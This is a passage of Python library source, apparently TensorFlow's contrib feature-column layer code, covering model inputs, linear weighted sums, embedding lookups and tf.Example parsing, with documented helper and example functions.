occupation_emb = embedding_column(sparse_id_column=occupation, dimension=16,
combiner="sum")
age = real_valued_column("age")
age_buckets = bucketized_column(
source_column=age,
boundaries=[18, 25, 30, 35, 40, 45, 50, 55, 60, 65])
feature_columns=[occupation_emb, age_buckets]
Args:
columns_to_tensors: A mapping from feature column to tensors. 'string' key
means a base feature (not-transformed). It can have FeatureColumn as a
key too. That means that FeatureColumn is already transformed by input
pipeline. For example, `inflow` may have handled transformations.
feature_columns: A set containing all the feature columns. All items in the
set should be instances of classes derived by FeatureColumn.
weight_collections: List of graph collections to which weights are added.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for variable_scope.
Returns:
A Tensor which can be consumed by hidden layers in the neural network.
Raises:
ValueError: if FeatureColumn cannot be consumed by a neural network.
"""
return _input_from_feature_columns(columns_to_tensors,
feature_columns,
weight_collections,
trainable,
scope,
output_rank=2,
default_name='input_from_feature_columns')
@experimental
def sequence_input_from_feature_columns(columns_to_tensors,
feature_columns,
weight_collections=None,
trainable=True,
scope=None):
"""Builds inputs for sequence models from `FeatureColumn`s.
See documentation for `input_from_feature_columns`. The following types of
`FeatureColumn` are permitted in `feature_columns`: `_OneHotColumn`,
`_EmbeddingColumn`, `_HashedEmbeddingColumn`, `_RealValuedColumn`,
`_DataFrameColumn`. In addition, columns in `feature_columns` may not be
constructed using any of the following: `HashedEmbeddingColumn`,
`BucketizedColumn`, `CrossedColumn`.
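Example (a minimal sketch; assumes `columns_to_tensors` was produced by
`parse_feature_columns_from_sequence_examples` and contains the column below):
```
measurements = real_valued_column("measurements")
first_layer = sequence_input_from_feature_columns(
columns_to_tensors=columns_to_tensors,
feature_columns=[measurements])
# first_layer has rank 3: [batch_size, sequence_length, total_dimension].
```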
Args:
columns_to_tensors: A mapping from feature column to tensors. 'string' key
means a base feature (not-transformed). It can have FeatureColumn as a
key too. That means that FeatureColumn is already transformed by input
pipeline. For example, `inflow` may have handled transformations.
feature_columns: A set containing all the feature columns. All items in the
set should be instances of classes derived by FeatureColumn.
weight_collections: List of graph collections to which weights are added.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for variable_scope.
Returns:
A Tensor which can be consumed by hidden layers in the neural network.
Raises:
ValueError: if FeatureColumn cannot be consumed by a neural network.
"""
_check_supported_sequence_columns(feature_columns)
_check_forbidden_sequence_columns(feature_columns)
return _input_from_feature_columns(
columns_to_tensors,
feature_columns,
weight_collections,
trainable,
scope,
output_rank=3,
default_name='sequence_input_from_feature_columns')
def _create_embedding_lookup(column,
columns_to_tensors,
embedding_lookup_arguments,
num_outputs,
trainable,
weight_collections):
"""Creates variables and returns predictions for linear weights in a model.
Args:
column: the column we're working on.
columns_to_tensors: a map from column name to tensors.
embedding_lookup_arguments: arguments for embedding lookup.
num_outputs: how many outputs.
trainable: whether the variable we create is trainable.
weight_collections: weights will be placed here.
Returns:
variables: the created embeddings.
predictions: the computed predictions.
"""
with variable_scope.variable_scope(
None, default_name=column.name, values=columns_to_tensors.values()):
variable = contrib_variables.model_variable(
name='weights',
shape=[embedding_lookup_arguments.vocab_size, num_outputs],
dtype=dtypes.float32,
initializer=embedding_lookup_arguments.initializer,
trainable=trainable,
collections=weight_collections)
if isinstance(variable, variables.Variable):
variable = [variable]
else:
variable = variable._get_variable_list() # pylint: disable=protected-access
predictions = embedding_ops.safe_embedding_lookup_sparse(
variable,
embedding_lookup_arguments.input_tensor,
sparse_weights=embedding_lookup_arguments.weight_tensor,
combiner=embedding_lookup_arguments.combiner,
name=column.name + '_weights')
return variable, predictions
def _maybe_restore_from_checkpoint(checkpoint_path, variable):
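"""Initializes `variable` from the `(path, tensor_name)` tuple, if provided."""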
if checkpoint_path is not None:
path, tensor_name = checkpoint_path
weights_to_restore = variable
if len(variable) == 1:
weights_to_restore = variable[0]
checkpoint_utils.init_from_checkpoint(path,
{tensor_name: weights_to_restore})
def _create_joint_embedding_lookup(columns_to_tensors,
embedding_lookup_arguments,
num_outputs,
trainable,
weight_collections):
"""Creates an embedding lookup for all columns sharing a single weight."""
for arg in embedding_lookup_arguments:
assert arg.weight_tensor is None, (
'Joint sums for weighted sparse columns are not supported. '
'Please use weighted_sum_from_feature_columns instead.')
assert arg.combiner == 'sum', (
'Combiners other than sum are not supported for joint sums. '
'Please use weighted_sum_from_feature_columns instead.')
assert len(embedding_lookup_arguments) >= 1, (
'At least one column must be in the model.')
prev_size = 0
sparse_tensors = []
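# Shift each column's sparse ids by the running vocabulary size so every
# column indexes a disjoint block of rows in the single shared weight matrix.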
for a in embedding_lookup_arguments:
t = a.input_tensor
values = t.values + prev_size
prev_size += a.vocab_size
sparse_tensors.append(
sparse_tensor_py.SparseTensor(t.indices,
values,
t.shape))
sparse_tensor = sparse_ops.sparse_concat(1, sparse_tensors)
with variable_scope.variable_scope(
None, default_name='linear_weights', values=columns_to_tensors.values()):
variable = contrib_variables.model_variable(
name='weights',
shape=[prev_size, num_outputs],
dtype=dtypes.float32,
initializer=init_ops.zeros_initializer,
trainable=trainable,
collections=weight_collections)
if isinstance(variable, variables.Variable):
variable = [variable]
else:
variable = variable._get_variable_list() # pylint: disable=protected-access
predictions = embedding_ops.safe_embedding_lookup_sparse(
variable,
sparse_tensor,
sparse_weights=None,
combiner='sum',
name='_weights')
return variable, predictions
def joint_weighted_sum_from_feature_columns(columns_to_tensors,
feature_columns,
num_outputs,
weight_collections=None,
trainable=True,
scope=None):
"""A restricted linear prediction builder based on FeatureColumns.
As long as all feature columns are unweighted sparse columns this computes the
prediction of a linear model which stores all weights in a single variable.
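Example (a minimal sketch; both sparse columns are hypothetical):
```
sparse_feature_a = sparse_column_with_hash_bucket(
column_name="sparse_feature_a", hash_bucket_size=100)
sparse_feature_b = sparse_column_with_hash_bucket(
column_name="sparse_feature_b", hash_bucket_size=100)
columns_to_tensor = tf.parse_example(...)
logits, weight_list, bias = joint_weighted_sum_from_feature_columns(
columns_to_tensors=columns_to_tensor,
feature_columns=[sparse_feature_a, sparse_feature_b],
num_outputs=1)
```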
Args:
columns_to_tensors: A mapping from feature column to tensors. 'string' key
means a base feature (not-transformed). It can have FeatureColumn as a
key too. That means that FeatureColumn is already transformed by input
pipeline. For example, `inflow` may have handled transformations.
feature_columns: A set containing all the feature columns. All items in the
set should be instances of classes derived from FeatureColumn.
num_outputs: An integer specifying number of outputs. Default value is 1.
weight_collections: List of graph collections to which weights are added.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for variable_scope.
Returns:
A tuple containing:
* A Tensor which represents predictions of a linear model.
* A list of Variables storing the weights.
* A Variable which is used for bias.
Raises:
ValueError: if FeatureColumn cannot be used for linear predictions.
"""
check_feature_columns(feature_columns)
with variable_scope.variable_scope(
scope,
default_name='joint_weighted_sum_from_feature_columns',
values=columns_to_tensors.values()):
transformer = _Transformer(columns_to_tensors)
embedding_lookup_arguments = []
for column in sorted(set(feature_columns), key=lambda x: x.key):
transformed_tensor = transformer.transform(column)
try:
embedding_lookup_arguments.append(
column._wide_embedding_lookup_arguments(transformed_tensor)) # pylint: disable=protected-access
except NotImplementedError:
raise NotImplementedError('Real-valued columns are not supported. '
'Use weighted_sum_from_feature_columns '
'instead, or bucketize these columns.')
variable, predictions_no_bias = _create_joint_embedding_lookup(
columns_to_tensors,
embedding_lookup_arguments,
num_outputs,
trainable,
weight_collections)
bias = contrib_variables.model_variable(
'bias_weight',
shape=[num_outputs],
initializer=init_ops.zeros_initializer,
collections=_add_variable_collection(weight_collections))
_log_variable(bias)
predictions = nn_ops.bias_add(predictions_no_bias, bias)
return predictions, variable, bias
def weighted_sum_from_feature_columns(columns_to_tensors,
feature_columns,
num_outputs,
weight_collections=None,
trainable=True,
scope=None):
"""A tf.contrib.layer style linear prediction builder based on FeatureColumns.
Generally a single example in training data is described with feature columns.
This function generates weighted sum for each num_outputs. Weighted sum refers
to logits in classification problems. It refers to prediction itself for
linear regression problems.
Example:
```
# Building model for training
feature_columns = (
real_valued_column("my_feature1"),
...
)
columns_to_tensor = tf.parse_example(...)
logits = weighted_sum_from_feature_columns(
columns_to_tensors=columns_to_tensor,
feature_columns=feature_columns,
num_outputs=1)
loss = tf.nn.sigmoid_cross_entropy_with_logits(logits, labels)
```
Args:
columns_to_tensors: A mapping from feature column to tensors. 'string' key
means a base feature (not-transformed). It can have FeatureColumn as a
key too. That means that FeatureColumn is already transformed by input
pipeline. For example, `inflow` may have handled transformations.
feature_columns: A set containing all the feature columns. All items in the
set should be instances of classes derived from FeatureColumn.
num_outputs: An integer specifying number of outputs. Default value is 1.
weight_collections: List of graph collections to which weights are added.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for variable_scope.
Returns:
A tuple containing:
* A Tensor which represents predictions of a linear model.
* A dictionary which maps feature_column to corresponding Variable.
* A Variable which is used for bias.
Raises:
ValueError: if FeatureColumn cannot be used for linear predictions.
"""
check_feature_columns(feature_columns)
with variable_scope.variable_scope(
scope,
default_name='weighted_sum_from_feature_columns',
values=columns_to_tensors.values()):
output_tensors = []
column_to_variable = dict()
transformer = _Transformer(columns_to_tensors)
# pylint: disable=protected-access
for column in sorted(set(feature_columns), key=lambda x: x.key):
transformed_tensor = transformer.transform(column)
try:
embedding_lookup_arguments = column._wide_embedding_lookup_arguments(
transformed_tensor)
variable, predictions = _create_embedding_lookup(
column,
columns_to_tensors,
embedding_lookup_arguments,
num_outputs,
trainable,
weight_collections)
except NotImplementedError:
with variable_scope.variable_scope(
None,
default_name=column.name,
values=columns_to_tensors.values()):
tensor = column._to_dense_tensor(transformed_tensor)
tensor = fc._reshape_real_valued_tensor(tensor, 2, column.name)
variable = [contrib_variables.model_variable(
name='weight',
shape=[tensor.get_shape()[1], num_outputs],
initializer=init_ops.zeros_initializer,
collections=weight_collections)]
predictions = math_ops.matmul(tensor, variable[0], name='matmul')
except ValueError as ee:
raise ValueError('Error creating weighted sum for column: {}.\n'
'{}'.format(column.name, ee))
output_tensors.append(predictions)
column_to_variable[column] = variable
_log_variable(variable)
_maybe_restore_from_checkpoint(column._checkpoint_path(), variable)
# pylint: enable=protected-access
predictions_no_bias = math_ops.add_n(output_tensors)
bias = contrib_variables.model_variable(
'bias_weight',
shape=[num_outputs],
initializer=init_ops.zeros_initializer,
collections=_add_variable_collection(weight_collections))
_log_variable(bias)
predictions = nn_ops.bias_add(predictions_no_bias, bias)
return predictions, column_to_variable, bias
def parse_feature_columns_from_examples(serialized,
feature_columns,
name=None,
example_names=None):
"""Parses tf.Examples to extract tensors for given feature_columns.
This is a wrapper of 'tf.parse_example'.
Example:
```python
columns_to_tensor = parse_feature_columns_from_examples(
serialized=my_data,
feature_columns=my_features)
# Where my_features are:
# Define features and transformations
sparse_feature_a = sparse_column_with_keys(
column_name="sparse_feature_a", keys=["AB", "CD", ...])
embedding_feature_a = embedding_column(
sparse_id_column=sparse_feature_a, dimension=3, combiner="sum")
sparse_feature_b = sparse_column_with_hash_bucket(
column_name="sparse_feature_b", hash_bucket_size=1000)
embedding_feature_b = embedding_column(
sparse_id_column=sparse_feature_b, dimension=16, combiner="sum")
crossed_feature_a_x_b = crossed_column(
columns=[sparse_feature_a, sparse_feature_b], hash_bucket_size=10000)
real_feature = real_valued_column("real_feature")
real_feature_buckets = bucketized_column(
source_column=real_feature, boundaries=[...])
my_features = [embedding_feature_b, real_feature_buckets, embedding_feature_a]
```
Args:
serialized: A vector (1-D Tensor) of strings, a batch of binary
serialized `Example` protos.
feature_columns: An iterable containing all the feature columns. All items
should be instances of classes derived from _FeatureColumn.
name: A name for this operation (optional).
example_names: A vector (1-D Tensor) of strings (optional), the names of
the serialized protos in the batch.
Returns:
A `dict` mapping FeatureColumn to `Tensor` and `SparseTensor` values.
"""
check_feature_columns(feature_columns)
columns_to_tensors = parsing_ops.parse_example(
serialized=serialized,
features=fc.create_feature_spec_for_parsing(feature_columns),
name=name,
example_names=example_names)
transformer = _Transformer(columns_to_tensors)
for column in sorted(set(feature_columns), key=lambda x: x.key):
transformer.transform(column)
return columns_to_tensors
def parse_feature_columns_from_sequence_examples(
serialized,
context_feature_columns,
sequence_feature_columns,
name=None,
example_name=None):
"""Parses tf.SequenceExamples to extract tensors for given `FeatureColumn`s.
Args:
serialized: A scalar (0-D Tensor) of type string, a single serialized
`SequenceExample` proto.
context_feature_columns: An iterable containing the feature columns for
context features. All items should be instances of classes derived from
`_FeatureColumn`. Can be `None`.
sequence_feature_columns: An iterable containing the feature columns for
sequence features. All items should be instances of classes derived from
`_FeatureColumn`. Can be `None`.
name: A name for this operation (optional).
    example_name: A scalar (0-D Tensor) of type string (optional), the name of
      the serialized proto.

  Returns:
A tuple consisting of:
context_features: a dict mapping `FeatureColumns` from
`context_feature_columns` to their parsed `Tensors`/`SparseTensor`s.
sequence_features: a dict mapping `FeatureColumns` from
`sequence_feature_columns` to their parsed `Tensors`/`SparseTensor`s.
"""
# Sequence example parsing requires a single (scalar) example.
try:
serialized = array_ops.reshape(serialized, [])
except ValueError as e:
raise ValueError(
        'serialized must contain a single sequence example. Batching must be '
        'done after parsing for sequence examples. Error: {}'.format(e))
if context_feature_columns is None:
context_feature_columns = []
if sequence_feature_columns is None:
sequence_feature_columns = []
check_feature_columns(context_feature_columns)
context_feature_spec = fc.create_feature_spec_for_parsing(
context_feature_columns)
check_feature_columns(sequence_feature_columns)
sequence_feature_spec = fc._create_sequence_feature_spec_for_parsing( # pylint: disable=protected-access
sequence_feature_columns, allow_missing_by_default=False)
return parsing_ops.parse_single_sequence_example(serialized,
context_feature_spec,
sequence_feature_spec,
example_name,
name)
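

# A hypothetical sketch of single-SequenceExample parsing (names here are
# illustrative assumptions; `my_serialized` must be a scalar string Tensor,
# since batching must happen after parsing):
def _example_parse_sequence(my_serialized):
  context_cols = [fc.real_valued_column('length')]
  sequence_cols = [fc.real_valued_column('token_score')]
  context, sequences = parse_feature_columns_from_sequence_examples(
      serialized=my_serialized,
      context_feature_columns=context_cols,
      sequence_feature_columns=sequence_cols)
  # `context` holds per-example features; `sequences` holds per-step features.
  return context, sequences
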

def _log_variable(variable):
  if isinstance(variable, list):
    for var in variable:
      if isinstance(var, variables.Variable):
        logging.info('Created variable %s, with device=%s', var.name,
                     var.device)
  elif isinstance(variable, variables.Variable):
    logging.info('Created variable %s, with device=%s', variable.name,
                 variable.device)

def _infer_real_valued_column_for_tensor(name, tensor):
"""Creates a real_valued_column for given tensor and name."""
  if isinstance(tensor, sparse_tensor_py.SparseTensor):
    raise ValueError(
        'SparseTensor is not supported for auto detection. Please define a '
        'corresponding FeatureColumn for tensor {} {}.'.format(name, tensor))
  if not (tensor.dtype.is_integer or tensor.dtype.is_floating):
    raise ValueError(
        'Non-integer and non-floating types are not supported for auto '
        'detection. Please define a corresponding FeatureColumn for tensor '
        '{} {}.'.format(name, tensor))
shape = tensor.get_shape().as_list()
dimension = 1
for i in range(1, len(shape)):
dimension *= shape[i]
return fc.real_valued_column(name, dimension=dimension, dtype=tensor.dtype)

def infer_real_valued_columns(features):
if not isinstance(features, dict):
return [_infer_real_valued_column_for_tensor('', features)]
feature_columns = []
for key, value in features.items():
feature_columns.append(_infer_real_valued_column_for_tensor(key, value))
return feature_columns
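

# A small sketch of the inference rule above: every dimension after the batch
# dimension is folded into a single `dimension`. The shapes below are
# assumptions chosen for illustration.
def _example_infer_columns():
  features = {
      'pixels': array_ops.zeros([32, 8, 8]),  # flattened to dimension 8*8=64
      'age': array_ops.zeros([32, 1]),        # dimension 1
  }
  return infer_real_valued_columns(features)
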
def check_feature_columns(feature_columns):
"""Checks the validity of the set of FeatureColumns.
Args:
feature_columns: A set of instances or subclasses of FeatureColumn.
Raises:
ValueError: If there are duplicate feature column keys.
"""
seen_keys = set()
for f in feature_columns:
key = f.key
if key in seen_keys:
raise ValueError('Duplicate feature column key found for column: {}. '
'This usually means that the column is almost identical '
'to another column, and one must be discarded.'.format(
f.name))
seen_keys.add(key)
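

# A sketch of the duplicate-key check (illustrative columns): two columns
# built from the same source name share a key, so validation fails.
def _example_duplicate_key_check():
  age_a = fc.real_valued_column('age')
  age_b = fc.real_valued_column('age')  # same key as age_a
  try:
    check_feature_columns([age_a, age_b])
  except ValueError as err:
    logging.info('Rejected duplicate column key: %s', err)
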
class _Transformer(object):
"""Handles all the transformations defined by FeatureColumn if needed.
FeatureColumn specifies how to digest an input column to the network. Some
feature columns require data transformations. This class handles those
transformations if they are not handled already.
  Some features may be used in more than one place. For example, one can use a
  bucketized feature by itself and also in a cross with it. In that case, the
  Transformer should create only one bucketization op instead of separate ops
  for each feature column. To handle re-use of transformed columns, the
  Transformer keeps all previously transformed columns.
An example usage of Transformer is as follows:
occupation = sparse_column_with_hash_bucket(column_name="occupation",
hash_bucket_size=1000)
age = real_valued_column("age")
age_buckets = bucketized_column(
source_column=age,
boundaries=[18, 25, 30, 35, 40, 45, 50, 55, 60, 65])
occupation_x_age = crossed_column(columns=[occupation, age_buckets],
hash_bucket_size=10000)
columns_to_tensor = tf.parse_example(...)
transformer = Transformer(columns_to_tensor)
occupation_x_age_tensor = transformer.transform(occupation_x_age)
occupation_tensor = transformer.transform(occupation)
age_buckets_tensor = transformer.transform(age_buckets)
"""

  def __init__(self, columns_to_tensors):
"""Initializes transfomer.
Args:
      columns_to_tensors: A mapping from feature columns to tensors. A 'string'
        key means a base (not-transformed) feature. It can have a FeatureColumn
        as a key too, meaning that the FeatureColumn has already been
        transformed by the input pipeline. For example, `inflow` may have
        handled transformations.
Transformed features are inserted in columns_to_tensors.
"""
self._columns_to_tensors = columns_to_tensors

  def transform(self, feature_column):
"""Returns a Tensor which represents given feature_column.
Args:
feature_column: An instance of FeatureColumn.
Returns:
A Tensor which represents given feature_column. It may create a new Tensor
or re-use an existing one.
Raises:
ValueError: if FeatureColumn cannot be handled by this Transformer.
"""
logging.debug('Transforming feature_column %s', feature_column)
if feature_column in self._columns_to_tensors:
# Feature_column is already transformed.
return self._columns_to_tensors[feature_column]
feature_column.insert_transformed_feature(self._columns_to_tensors)
if feature_column not in self._columns_to_tensors:
raise ValueError('Column {} is not supported.'.format(
feature_column.name))
return self._columns_to_tensors[feature_column]
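

# A sketch of the caching behavior described in the class docstring above.
# It assumes `columns_to_tensors` already maps the base key 'age' to a dense
# float Tensor; transforming the same column twice re-uses the cached result.
def _example_transformer_reuse(columns_to_tensors):
  age = fc.real_valued_column('age')
  age_buckets = fc.bucketized_column(age, boundaries=[18, 35, 65])
  transformer = _Transformer(columns_to_tensors)
  first = transformer.transform(age_buckets)
  second = transformer.transform(age_buckets)  # cache hit; no new op created
  return first is second  # True
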
def _add_variable_collection(weight_collections):
if weight_collections:
weight_collections = list(
set(list(weight_collections) + [ops.GraphKeys.GLOBAL_VARIABLES]))
return weight_collections

# TODO(jamieas): remove the following logic once all FeatureColumn types are
# supported for sequences.
# pylint: disable=protected-access
_SUPPORTED_SEQUENCE_COLUMNS = (fc._OneHotColumn,
fc._EmbeddingColumn,
fc._RealValuedColumn)
_FORBIDDEN_SEQUENCE_COLUMNS = (fc._HashedEmbeddingColumn,
fc._BucketizedColumn,
fc._CrossedColumn)

def _check_supported_sequence_columns(feature_columns):
"""Asserts `feature_columns` are in `_SUPPORTED_SEQUENCE_COLUMNS`."""
for col in feature_columns:
if not isinstance(col, _SUPPORTED_SEQUENCE_COLUMNS):
raise ValueError(
'FeatureColumn type {} is not currently supported for sequence data.'.
format(type(col).__name__))

def _get_parent_columns(feature_column):
"""Returns the tuple of `FeatureColumn`s that `feature_column` depends on."""
if isinstance(feature_column, (fc._WeightedSparseColumn,
fc._OneHotColumn,
fc._EmbeddingColumn,)):
return (feature_column.sparse_id_column,)
if isinstance(feature_column, (fc._BucketizedColumn,)):
return (feature_column.source_column,)
  if isinstance(feature_column, (fc._CrossedColumn,)):
return tuple(feature_column.columns)
return tuple()

def _gather_feature_columns(feature_columns):
"""Returns a list of all ancestor `FeatureColumns` of `feature_columns`."""
gathered = list(feature_columns)
i = 0
while i < len(gathered):
for column in _get_parent_columns(gathered[i]):
if column not in gathered:
gathered.append(column)
i += 1
return gathered
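

# A sketch of transitive ancestor gathering (illustrative columns): a crossed
# column pulls in its component columns, and a bucketized component pulls in
# its real-valued source.
def _example_gather_ancestors():
  occupation = fc.sparse_column_with_hash_bucket('occupation',
                                                 hash_bucket_size=1000)
  age = fc.real_valued_column('age')
  age_buckets = fc.bucketized_column(age, boundaries=[18, 65])
  crossed = fc.crossed_column([occupation, age_buckets],
                              hash_bucket_size=10000)
  # Expected to contain: crossed, occupation, age_buckets, and age.
  return _gather_feature_columns([crossed])
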
def _check_forbidden_sequence_columns(feature_columns):
"""Recursively cecks `feature_columns` for `_FORBIDDEN_SEQUENCE_COLUMNS`."""
all_feature_columns = _gather_feature_columns(feature_columns)
for feature_column in all_feature_columns:
if isinstance(feature_column, _FORBIDDEN_SEQUENCE_COLUMNS):
raise ValueError(
'Column {} is of type {}, which is not currently supported for '
'sequences.'.format(feature_column.name,
                              type(feature_column).__name__))
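

# A sketch of the recursive sequence check (illustrative columns): the crossed
# column below is itself forbidden, and its bucketized ancestor would also be
# caught via the transitive gathering above.
def _example_forbidden_sequence_check():
  occupation = fc.sparse_column_with_hash_bucket('occupation',
                                                 hash_bucket_size=1000)
  age_buckets = fc.bucketized_column(
      fc.real_valued_column('age'), boundaries=[18, 65])
  crossed = fc.crossed_column([occupation, age_buckets],
                              hash_bucket_size=10000)
  try:
    _check_forbidden_sequence_columns([crossed])
  except ValueError as err:
    logging.info('Forbidden for sequences: %s', err)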